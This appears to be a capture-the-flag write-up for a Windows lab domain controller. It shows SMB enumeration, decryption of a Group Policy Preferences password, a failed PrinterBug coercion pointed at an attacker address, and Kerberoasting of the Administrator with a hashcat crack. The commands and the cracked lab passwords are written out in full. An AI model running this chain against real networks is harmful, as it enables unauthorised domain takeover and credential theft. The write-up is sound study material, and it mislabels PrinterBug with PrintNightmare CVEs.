Active
Recon
nmap --open -T4 -p- 10.129.21.84
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-21 17:48 CET
# Nmap scan report for 10.129.21.84
# Host is up (0.035s latency).
# Not shown: 63727 closed tcp ports (reset), 1786 filtered tcp ports (no-response)
# Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
# PORT STATE SERVICE
# 53/tcp open domain
# 88/tcp open kerberos-sec
# 135/tcp open msrpc
# 139/tcp open netbios-ssn
# 389/tcp open ldap
# 445/tcp open microsoft-ds
# 464/tcp open kpasswd5
# 593/tcp open http-rpc-epmap
# 636/tcp open ldapssl
# 3268/tcp open globalcatLDAP
# 3269/tcp open globalcatLDAPssl
# 5722/tcp open msdfsr
# 9389/tcp open adws
# 49152/tcp open unknown
# 49153/tcp open unknown
# 49154/tcp open unknown
# 49155/tcp open unknown
# 49157/tcp open unknown
# 49158/tcp open unknown
# 49162/tcp open unknown
# 49166/tcp open unknown
# 49170/tcp open unknown
# Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds
nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389 10.129.21.84
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-21 17:50 CET
# Nmap scan report for 10.129.21.84
# Host is up (0.033s latency).
# PORT STATE SERVICE VERSION
# 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
# | dns-nsid:
# |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
# 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-21 16:50:46Z)
# 135/tcp open msrpc Microsoft Windows RPC
# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
# 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
# 445/tcp open microsoft-ds?
# 464/tcp open kpasswd5?
# 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
# 636/tcp open tcpwrapped
# 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
# 3269/tcp open tcpwrapped
# 5722/tcp open msrpc Microsoft Windows RPC
# 9389/tcp open mc-nmf .NET Message Framing
# Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
# Host script results:
# |_clock-skew: 13s
# | smb2-time:
# | date: 2025-12-21T16:51:37
# |_ start_date: 2025-12-21T16:47:30
# | smb2-security-mode:
# | 210:
# |_ Message signing enabled and required
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds
User
nxc smb 10.129.21.84 -u "" -p "" --shares
# SMB 10.129.21.84 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
# SMB 10.129.21.84 445 DC [+] active.htb\:
# SMB 10.129.21.84 445 DC [*] Enumerated shares
# SMB 10.129.21.84 445 DC Share Permissions Remark
# SMB 10.129.21.84 445 DC ----- ----------- ------
# SMB 10.129.21.84 445 DC ADMIN$ Remote Admin
# SMB 10.129.21.84 445 DC C$ Default share
# SMB 10.129.21.84 445 DC IPC$ Remote IPC
# SMB 10.129.21.84 445 DC NETLOGON Logon server share
# SMB 10.129.21.84 445 DC Replication READ
# SMB 10.129.21.84 445 DC SYSVOL Logon server share
# SMB 10.129.21.84 445 DC Users
Replication is interesting, it goes hand in hand with tcp/5722 MS-DFSR (Microsoft DFS Replication), if we look into the policices (\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml) we find the Groups.xml file:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Great, the passwordi s AES256 encrypted, though Windows leaked the master key in 2012 so we can just use gpp-decrypt to get the password:
gpp-decrypt.py -f Groups.xml
# __ __
# ___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
# / _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
# \_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
# /___/ /_/ /_/ /___/ /_/
# [ * ] Username: active.htb\SVC_TGS
# [ * ] Password: GPPstillStandingStrong2k18
Spooler is enabled and the machine is vulnerable to PrinterBug, though we need credentials first.
nxc smb 10.129.21.84 -u "SVC_TGS" -p "GPPstillStandingStrong2k18" --shares
# SMB 10.129.21.84 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
# SMB 10.129.21.84 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
# SMB 10.129.21.84 445 DC [*] Enumerated shares
# SMB 10.129.21.84 445 DC Share Permissions Remark
# SMB 10.129.21.84 445 DC ----- ----------- ------
# SMB 10.129.21.84 445 DC ADMIN$ Remote Admin
# SMB 10.129.21.84 445 DC C$ Default share
# SMB 10.129.21.84 445 DC IPC$ Remote IPC
# SMB 10.129.21.84 445 DC NETLOGON READ Logon server share
# SMB 10.129.21.84 445 DC Replication READ
# SMB 10.129.21.84 445 DC SYSVOL READ Logon server share
# SMB 10.129.21.84 445 DC Users READ
We can navigate to \Users\SVC_TGS\Desktop and read user.txt
Root
We now have credentials before I checked some common vulns due to the machine being Windows Server 2008 R2 and I found that Spooler is enabled and the machine is vulnerable to PrinterBug (CVE-2021-1675 and CVE-2021-34527).
Let's test it:
printerbug.py active.htb/SVC_TGS:GPPstillStandingStrong2k18@active.htb 10.10.15.34
# [*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
# [*] Attempting to trigger authentication via rprn RPC at active.htb
# [-] An unhandled exception has occured. Trying next host:
# [-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.
Mhh ok, maybe they patched it, let's move on, let's run bloodhound.
We find that the domain Administrator is kerberaostable.
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.21.84 -request
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
# ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
# -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
# active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2025-12-21 17:48:28.592139
# [-] CCache file is not found. Skipping...
# $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$98251b30aef0a55bc3063770f193beb4$ <SNIP>
hashcat -m 13100 -a 0 hash.txt `fzf-wordlists`
# $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$98251b30aef0a55bc3063770f193beb4$ <SNIP>:Ticketmaster1968
# Session..........: hashcat
# Status...........: Cracked
# Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
# Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...45fe8c
# Time.Started.....: Sun Dec 21 19:56:18 2025 (4 secs)
# Time.Estimated...: Sun Dec 21 19:56:22 2025 (0 secs)
# Kernel.Feature...: Pure Kernel
# Guess.Base.......: File (/opt/lists/rockyou.txt)
# Guess.Queue......: 1/1 (100.00%)
# Speed.#1.........: 2716.8 kH/s (1.96ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
# Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
# Progress.........: 10543104/14344384 (73.50%)
# Rejected.........: 0/10543104 (0.00%)
# Restore.Point....: 10534912/14344384 (73.44%)
# Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
# Candidate.Engine.: Device Generator
# Candidates.#1....: Tiona172 -> Teague
# Hardware.Mon.#1..: Temp: 67c Util: 72%
Again SMB: \Administrator\Desktop we get the root.txt